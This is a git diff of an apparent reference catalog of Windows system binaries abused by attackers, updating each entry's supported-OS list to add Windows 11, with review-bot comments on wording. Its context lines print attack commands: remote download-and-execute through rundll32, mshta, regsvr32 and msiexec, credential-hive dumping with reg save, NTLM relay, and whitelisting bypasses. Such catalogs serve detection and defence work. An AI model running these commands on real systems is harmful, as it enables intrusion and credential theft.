C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 7776867..1672e45 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml 
@@ -10,21 +10,21 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an alternate data stream Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab Description: Download and compresses the target file and stores it in the target file. Usecase: Download file and compress into a cab file Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\makecab.exe - Path: C:\Windows\SysWOW64\makecab.exe diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index a713768..dc20d90 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml 
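Review bot: The third Makecab.yml Description, `Download and compresses the target file and stores it in the target file`, mixes verb forms and uses "target file" for both source and destination; suggest `Description: Downloads and compresses the source file and stores the resulting CAB in the target file.` It sits on a context line of the hunk this commit already rewrites.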
@@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.013 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index abb2597..5ef010d 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -10,14 +10,14 @@ Commands: Category: AWL bypass Privileges: User MitreID: T1127.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code Category: Execute Privileges: User MitreID: T1127.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msbuild.exe @sample.rsp Description: Executes Logger statements from rsp file Usecase: Execute DLL 
@@ -31,14 +31,14 @@ Commands: Category: Execute Privileges: User MitreID: T1127.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msbuild.exe project.proj Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters Category: Execute Privileges: User MitreID: T1127.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe @@ -60,7 +60,7 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Msbuild.exe should not normally be executed on workstations Resources: - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 7f65131..3a539b7 100644 --- a/yml/OSBinaries/Msdt.yml 
+++ b/yml/OSBinaries/Msdt.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting Category: AWL bypass Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 2f68ca7..2822620 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.005 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code @@ -24,7 +24,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.005 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: mshta.exe "C:\ads\file.txt:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream 
diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index c9bc676..867b990 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -10,28 +10,28 @@ Commands: Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DLLRegisterServer to register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DLLRegisterServer to un-register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index b8f459c..969d433 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml 
@@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1546.007 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\WINDOWS\System32\Netsh.exe - Path: C:\WINDOWS\SysWOW64\Netsh.exe diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 7163688..07cd750 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.008 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: odbcconf /a {REGSVR c:\test\test.dll} Description: Execute DllREgisterServer from DLL specified. Usecase: Execute dll file using technique that can evade defensive counter measures Category: Execute Privileges: User MitreID: T1218.008 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\odbcconf.exe - Path: C:\Windows\SysWOW64\odbcconf.exe diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml index e12ad2c..966fe84 100644 --- a/yml/OSBinaries/OfflineScannerShell.yml +++ b/yml/OSBinaries/OfflineScannerShell.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1218 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe Detection: diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index e61cf7b..d47f1de 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml 
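Review bot: The second Odbcconf.yml Description has a casing typo, `Execute DllREgisterServer from DLL specified` → `Execute DllRegisterServer from the DLL specified`. It is a context line of the hunk being rewritten, so a cheap fix to fold into this formatting pass.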
@@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: pcalua.exe -a \\server\payload.dll Description: Open the target .DLL file with the Program Compatibilty Assistant. Usecase: Proxy execution of remote dll file @@ -24,7 +24,7 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\pcalua.exe Code_Sample: diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index e1bdc30..f40ee01 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\pcwrun.exe Code_Sample: diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index ed0405a..a93f50d 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml 
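Review bot: The Pcalua.yml Description `Open the target .DLL file with the Program Compatibilty Assistant` misspells the feature name; it should read `Program Compatibility Assistant`. It sits on a context line of the first Pcalua hunk, which this commit already touches.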
@@ -10,21 +10,21 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. Usecase: Copy/Download file from remote server Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\print.exe - Path: C:\Windows\SysWOW64\print.exe diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index ab90165..033961e 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml 
@@ -10,14 +10,14 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\spool\tools\PrintBrm.exe Detection: diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index 3e0443b..6ca8ef4 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml @@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material Usecase: Dump credentials from the Security Account Manager (SAM) Category: Credentials Privileges: Administrator MitreID: T1003.002 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\reg.exe - Path: C:\Windows\SysWOW64\reg.exe diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 5aa2b44..080b310 100644 
--- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -10,14 +10,14 @@ Commands: Category: AWL bypass Privileges: Local Admin MitreID: T1218.009 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.009 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index 3febc17..3868fd5 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regedit C:\ads\file.txt:regfile.reg Description: Import the target .REG file into the Registry. Usecase: Import hidden registry data from alternate data stream Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\regedit.exe - Path: C:\Windows\SysWOW64\regedit.exe diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml index a19af48..c193019 100644 --- a/yml/OSBinaries/Regini.yml +++ b/yml/OSBinaries/Regini.yml 
@@ -10,7 +10,7 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\regini.exe - Path: C:\Windows\SysWOW64\regini.exe diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index d7543ab..9971e61 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 5b8f856..bc2aa44 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: Local Admin MitreID: T1218.009 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL bypass Privileges: Local Admin MitreID: T1218.009 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\regsvcs.exe - Path: C:\Windows\SysWOW64\regsvcs.exe diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 08a9e44..258ac4b 100644 --- a/yml/OSBinaries/Regsvr32.yml 
+++ b/yml/OSBinaries/Regsvr32.yml @@ -10,28 +10,28 @@ Commands: Category: AWL bypass Privileges: User MitreID: T1218.010 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting Category: AWL bypass Privileges: User MitreID: T1218.010 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.010 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.010 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml index 41e3b1e..7b1b57d 100644 --- a/yml/OSBinaries/Replace.yml +++ b/yml/OSBinaries/Replace.yml 
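Review bot: While this hunk rewrites the OS field of all four Regsvr32.yml commands, the second and fourth entries are the same command (`regsvr32.exe /s /u /i:file.sct scrobj.dll`) with identical Description and Usecase text, differing only in `Category: AWL bypass` versus `Category: Execute`. If listing the command under both categories is intentional that is fine, but duplicated blocks tend to drift apart (this hunk has to patch both copies); otherwise one copy should be dropped. The first command of the file starts above this hunk's context, so I cannot tell whether it duplicates the third entry in the same way.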
@@ -10,14 +10,14 @@ Commands: Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A Description: Download/Copy bar.exe to outdir Usecase: Download file Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\replace.exe - Path: C:\Windows\SysWOW64\replace.exe diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml index 9f6d1bc..f796d04 100644 --- a/yml/OSBinaries/Rpcping.yml +++ b/yml/OSBinaries/Rpcping.yml @@ -10,14 +10,14 @@ Commands: Category: Credentials Privileges: User MitreID: T1003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set). Usecase: Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port Category: Credentials Privileges: User MitreID: T1187 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\rpcping.exe - Path: C:\Windows\SysWOW64\rpcping.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index bd8acc1..568f322 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml 
@@ -10,56 +10,56 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. Usecase: Execute DLL from SMB share. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. Usecase: Execute code from Internet Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. 
Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). 
Usecase: Execute code from alternate data stream Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe -sta {CLSID} Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows 10 (and likely previous versions) + OperatingSystem: Windows 10 (and likely previous versions), Windows 11 Full_Path: - Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index 0190d5c..c6dab01 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index 3f6fcf3..5ec954d 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml 
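Review bot: The `-sta {CLSID}` entry's field now reads `Windows 10 (and likely previous versions), Windows 11`, which puts a free-text hedge in the middle of what is otherwise a comma-separated version list, and the hedge now reads as if it qualified only Windows 10. Either the explicit version list used by the other eight commands in this file, or `OperatingSystem: Windows 10, Windows 11 (likely previous versions as well)`, would be clearer for readers and for any tooling that splits the field on commas. CL_LoadAssembly.yml and UtilityFunctions.yml further down do the same with `Windows 10 21H1 (likely other versions as well), Windows 11`.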
